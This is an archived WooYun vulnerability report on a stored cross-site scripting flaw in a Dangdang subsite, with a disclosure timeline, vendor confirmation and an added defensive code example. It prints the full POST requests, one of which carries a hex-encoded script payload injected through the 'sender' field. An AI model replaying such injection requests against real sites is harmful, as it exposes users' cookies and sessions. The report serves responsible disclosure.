
Vulnerability summary

Defect ID: wooyun-2013-040508

Title: Stored XSS on a Dangdang subsite

Vendor: Dangdang (当当网)

Author: D&G

Submitted: 2013-10-21 13:20

Fixed: 2013-12-05 13:21

Published: 2013-12-05 13:21

Vulnerability type: XSS (cross-site scripting)

Severity: Medium

Self-assessed Rank: 8

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2013-10-21: Details sent to the vendor; awaiting vendor handling
2013-10-21: Vendor confirmed; details disclosed to the vendor only
2013-10-31: Details disclosed to core white hats and domain experts
2013-11-10: Details disclosed to regular white hats
2013-11-20: Details disclosed to intern white hats
2013-12-05: Details disclosed to the public

Brief description:

Stored XSS on a Dangdang subsite

Detailed description:

http://robot.dangdang.com/WebIm/page/officialPortal.jsp
Reference: WooYun: 当当网某分站存储型xss漏洞一枚 (a stored XSS on a Dangdang subsite)
Of course, that one has already been fixed. The problem still exists, though, and the fix can be bypassed. This page feels like it is meant for internal use; there is no need to leave it publicly accessible.
Clicking "Add new topic" lets you add a title and content:

[Screenshot: dangdang1.png]


Send the following POST request:

POST /WebIm/JQueryAjaxServlet?t=1382331386011 HTTP/1.1
Host: robot.dangdang.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: application/json, text/javascript, */*
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://robot.dangdang.com/WebIm/page/officialPortal.jsp
Content-Length: 261
Cookie: JSESSIONID=2798D90285C59C9F7DBABFFEFD5BF140
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
action=officialPortalAction&method=fetchOfficialPost&arg=%7B%22extAttr%22%3A%7B%22company_id%22%3A%223%22%2C%22user_name%22%3A%22%22%2C%22title%22%3A%22qqqqq%22%2C%22postType%22%3A%220%22%2C%22sender%22%3A%22%22%2C%22context%22%3A%22qqqqq%22%2C%22replyid%22%3A%22%22%2C%22startCount%22%3A0%2C%22clientUid%22%3A%22fa1ec384-95a3-49fd-bebe-2703b9692b97%22%2C%22clientUserName%22%3A%22guest%22%7D%7D


The arg parameter carries the content passed to the server. Analyzing the content returned by the query:

\"id\":\"45\",\"sender\":\"\",\"title\":\"1\",\"eggs\":0,\"context\":\"2\",\"showStatus\":0,\"flowers\":0,\"subList\":[],\"replyID\":\"\",\"replycode\":\"\"},{\"followNum\":\"0\",\"company_id\":\"3\",\"sendTime\":\"2013-10-21


Besides the title and content (title, context), several other parameter values are returned, such as company_id and sender, and exactly these parameters are also present in the POST parameters. So, modify the sender parameter in the POST request to XSS code.
Send the following request:

Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://robot.dangdang.com/WebIm/page/officialPortal.jsp
Content-Length: 802
Cookie: JSESSIONID=2798D90285C59C9F7DBABFFEFD5BF140
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
action=officialPortalAction&method=addOfficialPost&arg=%7b%22%65%78%74%41%74%74%72%22%3a%7b%22%63%6f%6d%70%61%6e%79%5f%69%64%22%3a%22%33%22%2c%22%75%73%65%72%5f%6e%61%6d%65%22%3a%22%22%2c%22%74%69%74%6c%65%22%3a%22%71%71%71%71%71%22%2c%22%70%6f%73%74%54%79%70%65%22%3a%22%30%22%2c%22%73%65%6e%64%65%72%22%3a%22%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3c%2f%73%63%72%69%70%74%3e%22%2c%22%63%6f%6e%74%65%78%74%22%3a%22%71%71%71%71%71%22%2c%22%72%65%70%6c%79%69%64%22%3a%22%22%2c%22%73%74%61%72%74%43%6f%75%6e%74%22%3a%30%2c%22%63%6c%69%65%6e%74%55%69%64%22%3a%22%66%61%31%65%63%33%38%34%2d%39%35%61%33%2d%34%39%66%64%2d%62%65%62%65%2d%32%37%30%33%62%39%36%39%32%62%39%37%22%2c%22%63%6c%69%65%6e%74%55%73%65%72%4e%61%6d%65%22%3a%22%67%75%65%73%74%22%7d%7d


Sure enough, there is no filtering.

[Screenshot: dangdang2.png]
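The report describes two defects working together: the addOfficialPost handler stores client-supplied fields such as sender and company_id verbatim, and the fetchOfficialPost output is rendered without HTML encoding. The following is an added example, not code from the report or from Dangdang, showing the vulnerable storage path beside a hardened one and an output-encoding step for rendering; field names follow the arg JSON above, while the session object and the allowed postType values are assumptions.

```javascript
// Added example (not the report's or Dangdang's code). Field names follow the
// report's `arg` JSON; the `session` object and allowed postType values are assumed.

// Constructed `arg` payload in the shape the report shows, with a client-supplied
// `sender` carrying inert markup to demonstrate the problem.
const CONSTRUCTED_ARG = JSON.stringify({
  extAttr: {
    company_id: "3", user_name: "", title: "qqqqq", postType: "0",
    sender: "<b>guest</b>", context: "qqqqq", replyid: "", startCount: 0,
    clientUid: "constructed-uid", clientUserName: "guest",
  },
});

// Behaviour the report describes: every field in extAttr is stored as received,
// including fields the client should never control.
function addOfficialPostUnsafe(argJson) {
  return { ...JSON.parse(argJson).extAttr };
}

// Hardened handler: only title, context and a validated postType are taken from
// the request; company_id and sender come from the server-side session (stand-in).
function addOfficialPostSafe(argJson, session) {
  const ext = JSON.parse(argJson).extAttr ?? {};
  const ALLOWED_POST_TYPES = ["0", "1"]; // assumed set of legitimate values
  return {
    title: String(ext.title ?? "").slice(0, 200),
    context: String(ext.context ?? "").slice(0, 5000),
    postType: ALLOWED_POST_TYPES.includes(ext.postType) ? ext.postType : "0",
    company_id: session.companyId, // never from the client
    sender: session.userName,      // never from the client
  };
}

// Output encoding for the rendering path: every stored field that reaches HTML is
// escaped, so even a record stored by the unsafe handler renders as plain text.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderPost(post) {
  return `<div class="post"><span class="sender">${escapeHtml(post.sender)}</span>` +
    `<h3>${escapeHtml(post.title)}</h3><p>${escapeHtml(post.context)}</p></div>`;
}
```

Both fixes are needed: server-side field whitelisting removes the injection point the report uses, and output encoding protects anything already stored.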

Proof of vulnerability:

[Screenshot: dangdang2.png]

Suggested fix:

Just block off the page; it is not needed.

Copyright notice: please credit D&G@乌云 (WooYun) when reposting.


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2013-10-21 14:09

Vendor reply:

Thank you for your attention to Dangdang's security; we have contacted the business unit to fix this issue.

Latest status:

None